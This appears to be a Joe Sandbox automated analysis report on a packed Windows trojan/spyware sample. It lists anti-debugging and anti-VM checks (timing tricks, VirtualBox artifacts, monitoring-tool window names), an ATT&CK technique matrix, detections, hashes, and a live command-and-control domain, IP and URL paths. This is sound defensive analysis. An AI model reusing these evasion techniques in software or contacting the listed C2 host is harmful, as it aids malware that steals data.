Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0149 second address: 76B019A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ah, bl 0x0000000d mov edx, esi 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 jmp 00007F49E4E2C444h 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 jmp 00007F49E4E2C43Eh 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F49E4E2C43Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B019A second address: 76B01AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F214Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B01AA second address: 76B01AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B01AE second address: 76B0208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F49E47F2157h 0x0000000e mov edi, dword ptr [ebp+08h] 0x00000011 jmp 00007F49E47F2156h 0x00000016 mov dword ptr [esp+24h], 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F49E47F2157h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0208 second address: 76B0222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 303F313Ah 0x00000008 mov di, 2706h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lock bts dword ptr [edi], 00000000h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0222 second address: 76B0226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0226 second address: 76B022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B022C second address: 76B025C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F4A544A4338h 0x0000000f pushad 0x00000010 jmp 00007F49E47F214Ch 0x00000015 popad 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B025C second address: 76B0260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0260 second address: 76B0278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0278 second address: 76B0305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49E4E2C441h 0x00000008 pushfd 0x00000009 jmp 00007F49E4E2C440h 0x0000000e adc si, 5598h 0x00000013 jmp 00007F49E4E2C43Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop esi 0x0000001d jmp 00007F49E4E2C446h 0x00000022 pop ebx 0x00000023 jmp 00007F49E4E2C440h 0x00000028 mov esp, ebp 0x0000002a jmp 00007F49E4E2C440h 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F49E4E2C447h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E075A second address: 76E075E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E075E second address: 76E0762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0762 second address: 76E0768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0768 second address: 76E076E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E076E second address: 76E0772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E09C7 second address: 76E0AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F49E4E2C447h 0x00000011 or cl, 0000005Eh 0x00000014 jmp 00007F49E4E2C449h 0x00000019 popfd 0x0000001a jmp 00007F49E4E2C440h 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F49E4E2C440h 0x00000026 mov ebp, esp 0x00000028 jmp 00007F49E4E2C440h 0x0000002d push dword ptr [ebp+04h] 0x00000030 pushad 0x00000031 movzx ecx, dx 0x00000034 pushfd 0x00000035 jmp 00007F49E4E2C443h 0x0000003a sbb ax, C87Eh 0x0000003f jmp 00007F49E4E2C449h 0x00000044 popfd 0x00000045 popad 0x00000046 push dword ptr [ebp+0Ch] 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F49E4E2C448h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0AA9 second address: 76E0AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0AF1 second address: 76E0AF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0AF7 second address: 76E0AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0AFB second address: 76E0AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 775099A second address: 77509E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov bx, B3C6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f mov ah, dl 0x00000011 pushfd 0x00000012 jmp 00007F49E47F2154h 0x00000017 adc ah, 00000068h 0x0000001a jmp 00007F49E47F214Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dl, byte ptr [ebp+14h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 call 00007F49E47F214Bh 0x0000002c pop esi 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 77509E5 second address: 77509EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 77509EB second address: 77509EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 77509EF second address: 7750A0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+10h] 0x0000000b jmp 00007F49E4E2C43Ah 0x00000010 and dl, 00000007h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 7750A0D second address: 7750A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Special instruction interceptor: First address: 120B784 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Special instruction interceptor: First address: 105F68E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Special instruction interceptor: First address: 121BE4E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Special instruction interceptor: First address: 106196C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Special instruction interceptor: First address: 129BFFD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Code function: 0_2_00B69980 rdtsc 0_2_00B69980
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Code function: 0_2_0098255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0098255D
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Code function: 0_2_009829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_009829FF
Source: dZsdMl5Pwl.exe, dZsdMl5Pwl.exe, 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: dZsdMl5Pwl.exe Binary or memory string: Hyper-V RAW
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480980346.0000000001BC0000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000003.2465962176.0000000001BA7000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000003.2465726091.0000000001BA2000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000003.2466101707.0000000001BBF000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000003.2466035923.0000000001BAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe File opened: NTICE
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe File opened: SICE
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe File opened: SIWVID
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Code function: 0_2_00B69980 rdtsc 0_2_00B69980
Source: dZsdMl5Pwl.exe, dZsdMl5Pwl.exe, 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: procmon.exe
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic TCP traffic: 192.168.2.12:49712 -> 5.101.3.217:80
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 23 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | 1 Exploitation of Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 23 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label | Link
dZsdMl5Pwl.exe | 53% | ReversingLabs | Win32.Trojan.Generic |
dZsdMl5Pwl.exe | 100% | Avira | TR/Crypt.TPM.Gen |
dZsdMl5Pwl.exe | 100% | Joe Sandbox ML | |

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963 | 0% | Avira URL Cloud | safe |
http://home.fiveth5ht.top/OyKvQ | 0% | Avira URL Cloud | safe |
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4 | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 5.101.3.217 | true | false | | high
httpbin.org | 34.226.108.155 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | | high
https://httpbin.org/ip | false | | high

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
34.226.108.155 | httpbin.org | United States | | 14618 | AMAZON-AESUS | false
5.101.3.217 | home.fiveth5ht.top | Russian Federation | | 34665 | PINDC-ASRU | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581393
Start date and time: 2024-12-27 14:53:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: dZsdMl5Pwl.exe
renamed because original name is a hash value
Original Sample Name: efd7bbaba8aa8e6865430d1ffcfbf2d5.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: dZsdMl5Pwl.exe
No simulations
                                                    No context
                                                    No context
                                                    No created / dropped files found
                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Entropy (8bit):7.985643284885463
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • VXD Driver (31/22) 0.00%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:dZsdMl5Pwl.exe
                                                    File size:4'523'520 bytes
                                                    MD5:efd7bbaba8aa8e6865430d1ffcfbf2d5
                                                    SHA1:a9c1b894dc0628909524f21c2b8da3d80d4d1725
                                                    SHA256:044837966b88050aafba12d5765a42768de8b1b55cd83a274df9a0fcf17fede2
                                                    SHA512:eacc546270f7cc56567b2003ff0274ec063f756dda74a523a571be93197ae09167b37e6e644e67f586bbd23d4645684d00f5e5be28f991dc19e6fcd281957fd9
                                                    SSDEEP:98304:f9BerfMdJtZSrZBU0/2pF+TTwmddqkqNhoJKs5L:f9SMqYAqmdgNhoM
                                                    TLSH:6B2633697D29BCB3CD22D771BB07D828CDE63E742A1CA95871337A60A4153781B3D983
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2...@....... I...@..........................p........E...@... ............................
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x1044000
                                                    Entrypoint Section:.taggant
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                    DLL Characteristics:DYNAMIC_BASE
                                                    Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:
                                                        Instruction
                                                        jmp 00007F49E4D2287Ah
                                                        pmulhuw mm0, qword ptr [eax+eax+00h]
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 |  |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc42d14 | 0x10 | sqttxtfh |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xc42cc4 | 0x18 | sqttxtfh |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |  |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|  | 0x1000 | 0x6db000 | 0x288a00 | 2615fd27bd66b149e5e5e532d281c150 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x6dc000 | 0x1ac | 0x200 | c979f6ecbab12019998cc4f6cd466ed2 | False | 0.58203125 | data | 4.582961505512809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
|  | 0x6de000 | 0x3a1000 | 0x200 | 8f59b0972614fbf87f930b405e2fd01a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| sqttxtfh | 0xa7f000 | 0x1c4000 | 0x1c4000 | df38adbd30864cf2ff50aa80c2597d73 | False | 0.9945883961905421 | data | 7.955283388143556 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| byszctih | 0xc43000 | 0x1000 | 0x400 | 81d1aaf34c5f0299449799f5696a1b02 | False | 0.826171875 | data | 6.404714975012909 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0xc44000 | 0x3000 | 0x2200 | 4c683d03eaef372592eb092cae0a182a | False | 0.05939797794117647 | DOS executable (COM) | 0.7711665864792157 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0xc42d24 | 0x152 | ASCII text, with CRLF line terminators |  |  | 0.6479289940828402 |
| DLL | Import |
| kernel32.dll | lstrcpy |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                        Dec 27, 2024 14:54:15.562205076 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562242031 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562282085 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562304974 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562333107 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562340021 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562361956 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562391996 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562434912 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562495947 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562500000 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562553883 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562578917 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562632084 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562659025 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562725067 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562766075 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562869072 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562915087 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563005924 CET80497125.101.3.217192.168.2.12
